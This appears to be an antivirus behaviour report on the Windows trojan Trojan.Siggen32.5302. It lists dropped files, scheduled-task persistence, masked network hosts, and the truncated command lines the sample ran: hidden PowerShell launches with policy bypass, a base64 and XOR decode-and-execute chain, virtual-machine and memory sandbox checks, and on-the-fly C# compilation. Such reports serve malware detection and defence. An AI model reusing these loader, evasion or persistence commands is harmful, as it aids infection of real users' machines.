Trojan.Siggen32.5302

Technical Information

To ensure autorun and distribution

Creates or modifies the following files

<SYSTEM32>\tasks\oczpcnzkaclvkdhsyaocvoaxkzpaiywq
<SYSTEM32>\tasks\gdumimbcwpmu

Malicious functions

Injects code into

the following system processes:

%WINDIR%\explorer.exe

Modifies file system

Creates the following files

%TEMP%\pewqmxrv.bat
%ALLUSERSPROFILE%\inteldriver\regx.cmd
%ALLUSERSPROFILE%\tcblaunch.exe
%TEMP%\__psscriptpolicytest_ocpwfwqb.wew.ps1
%TEMP%\__psscriptpolicytest_uoz12q22.4ht.psm1
%TEMP%\content\5184-5180-tcblaunch.exe-12-39-23-316.dump
%TEMP%\content\5184-5180-tcblaunch.exe-12-39-23-485.dump
%ALLUSERSPROFILE%\inteldriver\boot64x.w
%TEMP%\content\5184-5180-tcblaunch.exe-12-39-23-869.dump
%LOCALAPPDATA%\microsoft\clr_v4.0\usagelogs\tcblaunch.exe.log
%TEMP%\__psscriptpolicytest_d25bygig.fai.ps1
%TEMP%\__psscriptpolicytest_suwhzjuj.3yr.psm1
%TEMP%\content\3024-5060-tcblaunch.exe-12-39-26-565.dump
%TEMP%\content\3024-5060-tcblaunch.exe-12-39-26-767.dump
%ALLUSERSPROFILE%\inteldriver\winhash.c
%TEMP%\content\3024-5060-tcblaunch.exe-12-39-27-068.dump
%TEMP%\__psscriptpolicytest_ud4rktk4.z4m.ps1
%TEMP%\__psscriptpolicytest_t2ukoyht.r3g.psm1
%TEMP%\content\3028-2336-tcblaunch.exe-12-39-29-001.dump
%TEMP%\content\3028-2336-tcblaunch.exe-12-39-29-293.dump
%TEMP%\content\3028-2336-tcblaunch.exe-12-39-29-826.dump
%TEMP%\content\3028-2336-tcblaunch.exe-12-39-29-949.dump
%TEMP%\content\3028-2336-tcblaunch.exe-12-39-29-980.dump
%TEMP%\luaj1pzg\luaj1pzg.0.cs
%TEMP%\luaj1pzg\luaj1pzg.cmdline
%TEMP%\luaj1pzg\luaj1pzg.out
%TEMP%\luaj1pzg\cscf2d6f6053bcd406f89bfba5ce9ef8273.tmp
%TEMP%\res407a.tmp
%TEMP%\luaj1pzg\luaj1pzg.dll
%TEMP%\content\3028-2336-tcblaunch.exe-12-39-32-802.dump
%TEMP%\content\3028-2336-tcblaunch.exe-12-39-33-060.dump
%APPDATA%\oczpcnzkaclvkdhsyaocvoaxkzpaiywq.xml
%TEMP%\content\3028-2336-tcblaunch.exe-12-39-39-628.dump
%APPDATA%\gdumimbcwpmu.xml
%LOCALAPPDATA%\gdumimbcwpmu.vbs
%TEMP%\content\3028-2336-tcblaunch.exe-12-39-41-642.dump

Deletes following files that it created itself

%TEMP%\__psscriptpolicytest_ocpwfwqb.wew.ps1
%TEMP%\__psscriptpolicytest_uoz12q22.4ht.psm1
%TEMP%\__psscriptpolicytest_d25bygig.fai.ps1
%TEMP%\__psscriptpolicytest_suwhzjuj.3yr.psm1
%TEMP%\__psscriptpolicytest_ud4rktk4.z4m.ps1
%TEMP%\__psscriptpolicytest_t2ukoyht.r3g.psm1
%TEMP%\res407a.tmp
%TEMP%\luaj1pzg\cscf2d6f6053bcd406f89bfba5ce9ef8273.tmp
%TEMP%\luaj1pzg\luaj1pzg.cmdline
%TEMP%\luaj1pzg\luaj1pzg.0.cs
%TEMP%\luaj1pzg\luaj1pzg.dll
%TEMP%\luaj1pzg\luaj1pzg.out
<SYSTEM32>\tasks\oczpcnzkaclvkdhsyaocvoaxkzpaiywq

Modifies the following files

%LOCALAPPDATA%\microsoft\windows\powershell\startupprofiledata-noninteractive

Network activity

Connects to

'mo#####.map.fastly.net':443
'ap#.##legram.org':443

TCP

Other

'ap#.##legram.org':443

UDP

DNS ASK mo#####.map.fastly.net
DNS ASK ap#.##legram.org

Miscellaneous

Creates and executes the following

'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -Command "Unblock-File -Path '%TEMP%\peWQMXRV.bat'"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -command "Start-Process -FilePath '%TEMP%\peWQMXRV.bat' -ArgumentList 'silent' -WindowStyle HIdden"
'%ALLUSERSPROFILE%\tcblaunch.exe' -c "$out=''; foreach ($line in Get-Content 'rEgX.cmd') { if ($line.StartsWith('::')) { $text = $line.Substring(2).TrimStart() -replace '{', ''; $out += $text + \"`n\" } }; Set-Content -Path 'bo...
'%ALLUSERSPROFILE%\tcblaunch.exe' -c "$out = ''; foreach ($line in Get-Content 'rEgX.cmd') { if ($line -match '^@\s+(.+)') { $clean = $matches[1]; $out += $clean + \"`n\" } }; Set-Content -Path 'winhash.c' -Value $out"
'%ALLUSERSPROFILE%\tcblaunch.exe' -c "$k='ka';$d=[Convert]::FromBase64String((Get-Content 'winhash.c' -Raw));$s='';$idx=0;foreach($b in $d){$s+=[char]($b -bxor [byte][char]$k[$idx]);$idx++;if($idx -ge $k.Length){$idx=0}};iex $s...

Executes the following

'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -Command "cd $env:TEMP; .\peWQMXRV.bat"
'<SYSTEM32>\cmd.exe' /c ""%TEMP%\peWQMXRV.bat""
'<SYSTEM32>\cmd.exe' /c ""%TEMP%\peWQMXRV.bat" silent "
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -Command "try{$r=(Get-CimInstance Win32_ComputerSystem).TotalPhysicalMemory;if(-not$r -or$r -lt 3221225472){exit 123}else{exit 0}}catch{exit 123}"
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -Command "if((Get-CimInstance Win32_ComputerSystem).Manufacturer -match 'VMware' -or (Get-CimInstance Win32_ComputerSystem).Model -match 'VMware' -or (Get-CimInstance Win32_BIOS).Man...
'<SYSTEM32>\attrib.exe' +s +h IntelDriver
'%WINDIR%\microsoft.net\framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\luaj1pzg\luaj1pzg.cmdline"
'%WINDIR%\microsoft.net\framework64\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES407A.tmp" "%TEMP%\luaj1pzg\CSCF2D6F6053BCD406F89BFBA5CE9EF8273.TMP"
'<SYSTEM32>\schtasks.exe' /create /tn ocZpcnZkaclvkdhsyaocvoaxkzpaiywq /xml %APPDATA%\ocZpcnZkaclvkdhsyaocvoaxkzpaiywq.xml /f
'<SYSTEM32>\schtasks.exe' /delete /tn ocZpcnZkaclvkdhsyaocvoaxkzpaiywq /f
'<SYSTEM32>\schtasks.exe' /create /tn gdumimbcwpmu /xml %APPDATA%\gdumimbcwpmu.xml /f
'<SYSTEM32>\cmd.exe' /c ""%TEMP%\peWQMXRV.bat" silent "' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\luaj1pzg\luaj1pzg.cmdline"' (with hidden window)
'%WINDIR%\microsoft.net\framework64\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES407A.tmp" "%TEMP%\luaj1pzg\CSCF2D6F6053BCD406F89BFBA5CE9EF8273.TMP"' (with hidden window)